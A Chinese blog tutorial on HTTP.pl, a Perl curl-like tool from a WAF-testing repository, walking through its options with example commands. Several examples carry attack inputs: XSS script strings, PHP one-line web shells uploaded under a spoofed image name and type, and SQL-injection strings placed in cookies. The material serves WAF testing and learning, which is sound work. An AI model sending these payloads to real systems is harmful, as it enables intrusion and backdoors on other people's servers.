HTTP.pl——通过HTTP发包工具了解HTTP协议
一、HTTP.pl功能简介
HTTP.pl perl编写的发包工具,简化版本curl,像curl致敬(唉,“致敬”都被于妈玩坏了)。
该发包工具支持HEAD,GET,METHOD三种基本请求方法,能处理 get/post方法的表单处理、文件上传请求、基本认证,能指定HTTP请求头,指定请求超时时间,指定自动Follow重定向的次数及使用代理。
使用的perl模块
(1)URI 相关模块 : 处理URI对象,分解及组装URI对象
use URI;
use URI::Split qw(uri_split uri_join);
use URI::Escape;
use LWP::UserAgent;
use HTTP::Headers;
use HTTP::Cookies;
use HTTP::Request::Common;
二、HTTP.pl脚本安装
git clone https://github.com/tanjiti/WAFTest
cpan App::cpanminuscat requirePackage.txt | cpanm
三、HTTP.pl使用实例
1. 脚本选项解析
perl HTTP.pl --help
-help 帮助选项
-url 'https://xxxx.xx.com' HTTP请求的URL
-m|method GET|POST|HEAD HTTP请求方法,默认为GET方法
-H|header X-Forwarded-For='127.0.0.1, 127.0.0.2' -H Via='Squid' HTTP请求头
-cookie usertrack='123456' -b hit=1 HTTP cookie
-d|data name='tanjiti' -d passwd=12345 HTTP 查询字符串/post表单数据
-A|user-agent 'baiduspider' HTTP UserAgent,默认值 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
-e|referer 'https://www.baidu.com' HTTP Referer
-proxy 'https://64.34.14.28:7808' 代理,支持https,http,socks代理
-t|timeout 180 请求超时时间,默认值180s
-L|redirect 7 重定向次数,默认值7次
-F|fileUpload 表明本次请求为文件上传
-fileFiled 'uploaded' 文件域name
-filePath '/tmp/a.jpeg' 本地文件路径
-fileName 'a.php' 上传文件名
-fileContent '<?php eval($_POST[a]);?>' 上传文件内容
-fileType 'image/jpeg' 上传文件类型
-s|silent : 隐藏http完整内容,只显示http响应消息
-r|raw : 表明采用未进行urlencode编码的方式提交post数据
-basicAuth : 表明此次请求为HTTP基本认证
-username tanjiti 基本认证用户名
-password 12345 基本认证密码
2.重定向例子
(1)关闭自动重定向
选项 -L
./HTTP.pl -url https://www.tanjiti.com/redirect.php -L 0
(2)设置自动重定向次数,默认为7次
./HTTP.pl -url https://www.tanjiti.com/redirect.php -L 1
3.基本认证例子
选项
-basicAuth : 表明此次请求为HTTP基本认证
-username tanjiti 基本认证用户名
-password 12345 基本认证密码
需要基本验证的请求
./HTTP.pl -url https://www.tanjiti.com/xxx/
基本验证
./HTTP.pl -url https://www.tanjiti.com/xxx/ -basicAuth -username tanjiti -password q
4. GET提交表单的例子
选项 -d
./HTTP.pl -url https://www.tanjiti.com/get.php -d keyword='name<script>alert(1)</script>' -d submit='submit'
5. POST提交表单的例子
选项
-d 提交数据
-method 指定HTTP请求方法
-raw 是否进行urlencode编码
(1)提交urlencode编码./HTTP.pl -url https://www.tanjiti.com/get.php -d keyword='name<script>alert(1)</script>' -d submit='submit' -method post
(2)提交原始数据
./HTTP.pl -url https://www.tanjiti.com/get.php -d keyword='name<script>alert(1)</script>' -d submit='submit' -method post -raw
6. 提交文件上传请求
选项说明
-F|fileUpload 表明本次请求为文件上传
-fileFiled 'uploaded' 文件域name-filePath '/tmp/a.jpeg' 本地文件路径
-fileName 'a.php' 上传文件名
-fileContent '<?php eval($_POST[a]);?>' 上传文件内容
-fileType 'image/jpeg' 上传文件类型
-d 其他表单域数据
上传php文件
./HTTP.pl -url https://www.tanjiti.com/fileUpload.php -fileUpload -fileFiled uploaded -d upload=upload -filePath "/tmp/phpinfo.php"
上传jpeg图片文件
./HTTP.pl -url https://www.tanjiti.com/fileUpload.php -fileUpload -fileFiled uploaded -d upload=upload -filePath "/tmp/king.jpeg"
(2) 上传本地文件到服务器,并修改文件实际的名字和类型
文件上传处理程序一般会检查文件名和文件类型,我们可以对其进行伪造
./HTTP.pl -url https://www.tanjiti.com/fileUpload.php -fileUpload -fileFiled uploaded -d upload=upload -filePath "/tmp/phpinfo.php" -fileName '1.jpg .php' -fileType 'image/jpeg'
(3) 自己构造文件上传包的内容,包括文件名,文件类型,文件内容
./HTTP.pl -url https://www.tanjiti.com/fileUpload.php -fileUpload -fileFiled uploaded -d upload=upload -fileName 'avator.jpeg' -fileType 'image/jpeg' -fileContent '<?php @eval($_POST[a]);?>'
7.构造cookie头
选项
-cookie
./HTTP.pl -url https://www.tanjiti.com/a.php -cookie username="tanjiti' or ''= '' -- " -cookie password='1 or 1=1 --'
8.构造HTTP头
在web攻击中,除了篡改cookie,http请求体外,http请求头也是被攻击的对象。因为应用程序出于某些特定需求需要从http请求头里收集信息。
下面是常见用于日志收集的HTTP请求头:
User-Agent 脚本中默认为 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Referer 用户是从这个页面上依照链接跳转过来的
Host
Accept 告知服务器发送何种媒体类型,脚本中默认为text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Charset e.g. utf-8 告知服务器发送何种字符集
Accept-Encoding 告知服务器采用何种编码,脚本中默认为gzip,deflate,sdch
Accept-Language 告知服务器采用何种语言,脚本中默认为 zh-CN,zh;q=0.8,en;q=0.6
X_Forwarded_For 经过的客户端IP地址
Via 代理服务器标识
(1) 指定UserAgent选项
-A 或者-user-agent
./HTTP.pl -url https://www.tanjiti.com -A 'tanjiti'
选项
-e 或者-referer
./HTTP.pl -url https://www.tanjiti.com -e 'https://www.google.com'
(3)指定HTTP头
./HTTP.pl -url https://127.0.0.1 -H Accept='*/*' -H Accept-Charset='utf-8' -H Accept-Encoding='identity' -H Accept-Language='zh-CN,zh;q=0.8,en;q=0.6' -H Host='www.tanjiti.com' -H Via='1.0 tanjiit.com(squid 0.54)' -H X-Forwarded-For='129.78.138.66, 129.78.64.103'
8.使用代理例子
选项 -proxy
(1)使用HTTP代理
./HTTP.pl -url https://www.tanjiti.com -proxy https://61.158.219.226:8118
(2) 使用tor/socks代理
./HTTP.pl -url https://www.tanjiti.com -proxy socks://127.0.0.1:9050
./HTTP.pl -url https://www.tanjiti.com -proxy socks://180.153.139.246:8888
9.其它选项
(1) 仅发包,不回显具体的HTTP协议包
选项 -s
./HTTP.pl -url https://www.tanjiti.com/a.php -s
(2)指定请求超时时间,默认为180s选项 -t (单位s)
./HTTP.pl -url https://www.tanjiti.com/ -t 20
四、HTTPFromFile.pl从文件内容构造HTTP请求来发包
以测试某个站点WAF的XSS防御为例
第一步:构造XSS请求包
echo -ne 'GET /?a= HTTP/1.1\r\nHost: www.tanjiti.com\r\nUserAgent: curl 0.9\r\n' > xss.t
第二步:发送xss请求包
perl HTTPFromFile.pl -code 403 -host www.tanjiti.com -port 80 -file xss.t
-code: 预期的http响应码,不是所有的waf都用403做拦截响应码
-host: 指定发包的Host,默认为127.0.0.1
-port 指定发包的端口,默认为80
-file 指定存放请求包内容的文件,必须指定该参数
HTTPFromFile还可以批量读取文件内容与发送请求包,并通缉结果
perl HTTPFromFile.pl -host www.tanjiti.com -dir ~/WAFTest/t
-dir 指定存放请求包内容的文件目录
参考:
《HTTP权威指南》
https://en.wikipedia.org/wiki/List_of_HTTP_header_fields
https://search.cpan.org/~mschilli/libwww-perl/lib/LWP.pm
来源:碳基体
评论